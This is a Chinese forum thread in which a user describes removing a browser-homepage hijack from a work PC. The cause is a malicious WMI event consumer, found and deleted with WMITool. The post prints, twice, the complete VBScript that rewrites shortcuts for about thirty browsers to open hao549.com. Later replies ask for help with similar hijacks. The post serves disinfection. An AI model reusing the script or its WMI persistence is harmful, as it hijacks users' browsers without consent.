解决一个浏览器主页恶意劫持问题（关键词WMI scrcons hao549 hao123 2345 6789）

tiandeyans

今天公司财务主管突然问我一个浏览器主页被修改的问题 说找了网管哥们看过了还是没解决

我过去看了一下 财务电脑里除了IE还安装了两个浏览器 UC和360浏览器 快捷方式都被添加了hao549的指向

这里赞一下UC浏览器 因为是UC浏览器主动弹出主页被恶意修改的提示窗 这个问题才被重视起来

同时鄙视一下360安全卫士和金山毒霸，当时财务电脑里这两款软件都正常运行且升级到最新版本 结果是完全无用……

好了 闲话少叙 开始解决问题

经过网络资料搜索 看到木子李的Blog提到过类似的问题了 原因是通过WMI定时发起的脚本给所有浏览器添加了域名指向

按图索骥下载了WMITool软件 点击左上角register for events，弹出Connect to namespace框，填入“root\subscription”

点击左侧_EventFilter:Name="unown_filter"，再至右侧右键点击ActiveScriptEventConsume r Name="unown"，右键选择view instant properties

查看ScriptText项…… 结果…… 结果没有发现文章中那段VBScript…… 到底是什么情况？？？

没办法 动用Process Monitor工具追踪了浏览器图标 结果发现确实是有脚本打开了scrcons.exe 跟文章中提到的情况雷同 看来是别的WMI
最后几番查找，终于在root\CIMV2里面揪出了真凶

缘来是在Consumer in root\CIMV2 -> _EventConsumer -> ActiveScriptEventConsumer下，找到ActiveScriptEventConsumer.Name=”VBScriptKids_consumer”

最后是在ScriptText中找到如下代码：

[JavaScript] 纯文本查看 复制代码

On Error Resume Next:Const link = "http://hao549.com/?r=v&m=4":Const link360 = "http://hao549.com/?r=v&m=4&s=3":browsers = "114ie.exe,115chrome.exe,1616browser.exe,2345chrome.exe,2345explorer.exe,360se.exe,360chrome.exe,avant.exe,baidubrowser.exe,chgreenbrowser.exe,chrome.exe,firefox.exe,greenbrowser.exe,iexplore.exe,juzi.exe,kbrowser.exe,launcher.exe,liebao.exe,maxthon.exe,niuniubrowser.exe,qqbrowser.exe,sogouexplorer.exe,srie.exe,tango3.exe,theworld.exe,tiantian.exe,twchrome.exe,ucbrowser.exe,webgamegt.exe,xbrowser.exe,xttbrowser.exe,yidian.exe,yyexplorer.exe":lnkpaths = "C:\Users\Public\Desktop,C:\ProgramData\Microsoft\Windows\Start Menu\Programs,C:\Users\tiand\Desktop,C:\Users\tiand\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch,C:\Users\tiand\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu,C:\Users\tiand\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar,C:\Users\tiand\AppData\Roaming\Microsoft\Windows\Start Menu\Programs":browsersArr = split(browsers,","):Set oDic = CreateObject("scripting.dictionary"):For Each browser In browsersArr:oDic.Add LCase(browser), browser:Next:lnkpathsArr = split(lnkpaths,","):Set oFolders = CreateObject("scripting.dictionary"):For Each lnkpath In lnkpathsArr:oFolders.Add lnkpath, lnkpath:Next:Set fso = CreateObject("Scripting.Filesystemobject"):Set WshShell = CreateObject("Wscript.Shell"):For Each oFolder In oFolders:If fso.FolderExists(oFolder) Then:For Each file In fso.GetFolder(oFolder).Files:If LCase(fso.GetExtensionName(file.Path)) = "lnk" Then:Set oShellLink = WshShell.CreateShortcut(file.Path):path = oShellLink.TargetPath:name = fso.GetBaseName(path) & "." & fso.GetExtensionName(path):If oDic.Exists(LCase(name)) Then:If LCase(name) = LCase("360se.exe") Then:oShellLink.Arguments = link360:Else:oShellLink.Arguments = link:End If:If file.Attributes And 1 Then:file.Attributes = file.Attributes - 1:End If:oShellLink.Save:End If:End If:Next:End If:Next:

排版后如下：

[JavaScript] 纯文本查看 复制代码

On Error Resume Next
Const link = "http://hao549.com/?r=v&m=4"
Const link360 = "http://hao549.com/?r=v&m=4&s=3"
browsers = "114ie.exe,115chrome.exe,1616browser.exe,2345chrome.exe,2345explorer.exe,360se.exe,360chrome.exe,,avant.exe,baidubrowser.exe,chgreenbrowser.exe,chrome.exe,firefox.exe,greenbrowser.exe,iexplore.exe,juzi.exe,kbrowser.exe,launcher.exe,liebao.exe,maxthon.exe,niuniubrowser.exe,qqbrowser.exe,sogouexplorer.exe,srie.exe,tango3.exe,theworld.exe,tiantian.exe,twchrome.exe,ucbrowser.exe,webgamegt.exe,xbrowser.exe,xttbrowser.exe,yidian.exe,yyexplorer.exe"

lnkpaths = "C:\Users\Public\Desktop,C:\ProgramData\Microsoft\Windows\Start Menu\Programs,C:\Users\tiand\Desktop,C:\Users\tiand\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch,C:\Users\tiand\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu,C:\Users\tiand\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar,C:\Users\tiand\AppData\Roaming\Microsoft\Windows\Start Menu\Programs"

browsersArr = split(browsers,",")
Set oDic = CreateObject("scripting.dictionary")

For Each browser In browsersArr
  oDic.Add LCase(browser), browser
Next
  lnkpathsArr = split(lnkpaths,",")

  Set oFolders = CreateObject("scripting.dictionary")
  For Each lnkpath In lnkpathsArr
    oFolders.Add lnkpath, lnkpath
  Next
    Set fso = CreateObject("Scripting.Filesystemobject")
    Set WshShell = CreateObject("Wscript.Shell")
    For Each oFolder In oFolders
      If fso.FolderExists(oFolder) Then
        For Each file In fso.GetFolder(oFolder).Files
          If LCase(fso.GetExtensionName(file.Path)) = "lnk" Then
            Set oShellLink = WshShell.CreateShortcut(file.Path)
            path = oShellLink.TargetPath
            name = fso.GetBaseName(path) & "." & fso.GetExtensionName(path)
            If oDic.Exists(LCase(name)) Then
              If LCase(name) = LCase("360se.exe") Then
                oShellLink.Arguments = link360
              Else
                oShellLink.Arguments = link
              End If
              If file.Attributes And 1 Then
                file.Attributes = file.Attributes - 1
              End If
              oShellLink.Save
            End If
          End If
       Next
      End If
    Next

呼~终于找到了 然后以管理员身份运行WMITool程序（wbemeventviewer.exe）进入root\CIMV2 删除恶意脚本

最后把几个浏览器的快捷方式跳转链接删除 问题解决

一个老问题 费这么大劲才解决 请坛里的大神笑笑就好 谢谢大家了

PS：补充一张图 感谢楼下很多朋友的热情回复 也有个别朋友找到了恶意脚本 却不知如何删除
想来还是兄弟光顾着打字 没有贴图的原因 这里补一张模拟图（原脚本已经删除了） 请参考
另外还请大家注意 一定要使用“管理员身份运行”wbemeventviewer.exe才可以顺利删除

tiandeyans

钰树临风 发表于 2016-12-7 09:25
我也有 可以找到脚本 但是怎么删除呢 没有找到地方

已经更新了帖子 方便朋友参考操作

zippo00

完全看不懂，我电脑也有这个劫持问题，只是我看不懂是什么，能帮我分析下吗？这个传图片不方便，我以附件方式放进去，以数字标识就得了，
这个1图是我在360浏览器里面输入要搜索的词，
2图是搜索到的结果，
3图是我随便点开搜索结果首页里的一个网址当时没加载完成
4图是我在打开搜索结果里面任意一个网页时搜索结果页就跳到了其他的网页去，如图中的kv.flyche.cn这个网址，有时或者是毒霸网址，有时是百度
大神能帮我分析下这个是什么问题么？感激不尽，

噬魂丶魂殇

好厉害的样子，虽然我看不懂.............

reathless

我曾经也有这样的问题，快捷方式不带链接的，可是每次打开就是恶意网址，后来毛了直接下个360给清掉了，你说的360卫士没反应是不是当时已经提示了 你的财务没留意？或是不懂情况点确定了？一般懂电脑的人都不会同时装两个杀软的而且还是两个国产杀软，一个二个都是流氓。一个是老流氓一个是新流氓。

草分357

主页被2345篡改，网上所有方法都试过，怎么解决，请教一下

rzlsysw01

好厉害的样子，虽然我早就知道.............

沐浴一米阳光

我也有这样的问题，一直没办法处理。

jandyx

看了~~学习学习！

梦入神机

学习了，感谢分享

奔跑中的猫须

感谢分享